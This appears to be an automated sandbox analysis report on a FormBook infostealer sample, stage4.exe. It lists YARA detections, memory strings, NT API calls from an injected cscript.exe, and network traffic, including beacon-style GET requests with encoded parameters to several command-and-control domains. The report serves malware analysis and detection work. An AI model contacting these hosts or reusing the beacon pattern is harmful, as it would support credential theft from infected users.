Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 22 Nov 2021 13:42:26 GMTContent-Type: text/htmlContent-Length: 275ETag: "6193c8c9-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 22 Nov 2021 13:43:07 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be761-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: explorer.exe, 0000000F.00000000.364635706.00000000086E8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000F.00000003.349908622.0000000008844000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.366683920.0000000008844000.00000004.00000001.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 0000000F.00000000.317525640.0000000002BCB000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cm/x

Source: unknown

DNS traffic detected: queries for: www.feetlover.online

Source: global traffic	HTTP traffic detected: GET /n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.feetlover.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8rn/?DFNPQJ=h1fp3Hda9mAZkqRDMBzhuAsSSpfRTgMN3yh/hpwpAz6PQ27xv5wLBHD9XtakgWKnfsj5&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.dartsearchengine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.egregore.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8rn/?DFNPQJ=NdSdCS1so+jBOhKbX6Hl5r/uB2055iwTMCcKjDuiSwVFzL3wqZseOva8MEOaJLNdbnoX&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.gconsultingfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: stage4.exe, 00000000.00000002.395798029.0000000000E9A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

PE file has a writeable .text section

Show sources

Source: stage4.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: stage4.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01201174	0_2_01201174
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121C9A8	0_2_0121C9A8
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121C9B9	0_2_0121C9B9
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01201030	0_2_01201030
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121B8C3	0_2_0121B8C3
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01202D89	0_2_01202D89
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01202D90	0_2_01202D90
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01208C6C	0_2_01208C6C
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01208C70	0_2_01208C70
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121BCDD	0_2_0121BCDD
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121BF11	0_2_0121BF11
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121CF7D	0_2_0121CF7D
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01202FB0	0_2_01202FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05581D55	22_2_05581D55
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05582D07	22_2_05582D07
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B0D20	22_2_054B0D20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055825DD	22_2_055825DD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CD5E0	22_2_054CD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E2581	22_2_054E2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557D466	22_2_0557D466
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C841F	22_2_054C841F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05581FF1	22_2_05581FF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557D616	22_2_0557D616
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D6E30	22_2_054D6E30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05582EF7	22_2_05582EF7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BF900	22_2_054BF900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D4120	22_2_054D4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571002	22_2_05571002
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055828EC	22_2_055828EC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CB090	22_2_054CB090
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E20A0	22_2_054E20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055820A8	22_2_055820A8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05582B28	22_2_05582B28
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557DBD2	22_2_0557DBD2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EEBB0	22_2_054EEBB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055822AE	22_2_055822AE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010EC9A8	22_2_010EC9A8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010EC9B9	22_2_010EC9B9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010D2D89	22_2_010D2D89
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010D2D90	22_2_010D2D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010D8C6C	22_2_010D8C6C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010D8C70	22_2_010D8C70
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010ECF7D	22_2_010ECF7D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010D2FB0	22_2_010D2FB0

Source: C:\Windows\SysWOW64\cscript.exe

Code function: String function: 054BB150 appears 35 times

Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_012185D0 NtCreateFile,	0_2_012185D0
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01218700 NtClose,	0_2_01218700
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_012187B0 NtAllocateVirtualMemory,	0_2_012187B0
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01218680 NtReadFile,	0_2_01218680
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_012185CA NtCreateFile,	0_2_012185CA
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_012187AA NtAllocateVirtualMemory,	0_2_012187AA
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121867C NtReadFile,	0_2_0121867C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9540 NtReadFile,LdrInitializeThunk,	22_2_054F9540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F95D0 NtClose,LdrInitializeThunk,	22_2_054F95D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9710 NtQueryInformationToken,LdrInitializeThunk,	22_2_054F9710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9FE0 NtCreateMutant,LdrInitializeThunk,	22_2_054F9FE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9780 NtMapViewOfSection,LdrInitializeThunk,	22_2_054F9780
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9650 NtQueryValueKey,LdrInitializeThunk,	22_2_054F9650
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9660 NtAllocateVirtualMemory,LdrInitializeThunk,	22_2_054F9660
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F96D0 NtCreateKey,LdrInitializeThunk,	22_2_054F96D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F96E0 NtFreeVirtualMemory,LdrInitializeThunk,	22_2_054F96E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	22_2_054F9910
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F99A0 NtCreateSection,LdrInitializeThunk,	22_2_054F99A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9840 NtDelayExecution,LdrInitializeThunk,	22_2_054F9840
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9860 NtQuerySystemInformation,LdrInitializeThunk,	22_2_054F9860
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9A50 NtCreateFile,LdrInitializeThunk,	22_2_054F9A50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9560 NtWriteFile,	22_2_054F9560
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9520 NtWaitForSingleObject,	22_2_054F9520
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054FAD30 NtSetContextThread,	22_2_054FAD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F95F0 NtQueryInformationFile,	22_2_054F95F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9760 NtOpenProcess,	22_2_054F9760
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054FA770 NtOpenThread,	22_2_054FA770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9770 NtSetInformationFile,	22_2_054F9770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054FA710 NtOpenProcessToken,	22_2_054FA710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9730 NtQueryVirtualMemory,	22_2_054F9730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F97A0 NtUnmapViewOfSection,	22_2_054F97A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9670 NtQueryInformationProcess,	22_2_054F9670
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9610 NtEnumerateValueKey,	22_2_054F9610
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9950 NtQueueApcThread,	22_2_054F9950
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F99D0 NtCreateProcessEx,	22_2_054F99D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054FB040 NtSuspendThread,	22_2_054FB040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9820 NtEnumerateKey,	22_2_054F9820
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F98F0 NtReadVirtualMemory,	22_2_054F98F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F98A0 NtWriteVirtualMemory,	22_2_054F98A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9B00 NtSetValueKey,	22_2_054F9B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054FA3B0 NtGetContextThread,	22_2_054FA3B0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9A00 NtProtectVirtualMemory,	22_2_054F9A00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9A10 NtQuerySection,	22_2_054F9A10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9A20 NtResumeThread,	22_2_054F9A20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F9A80 NtOpenDirectoryObject,	22_2_054F9A80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010E85D0 NtCreateFile,	22_2_010E85D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010E8700 NtClose,	22_2_010E8700
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010E87B0 NtAllocateVirtualMemory,	22_2_010E87B0
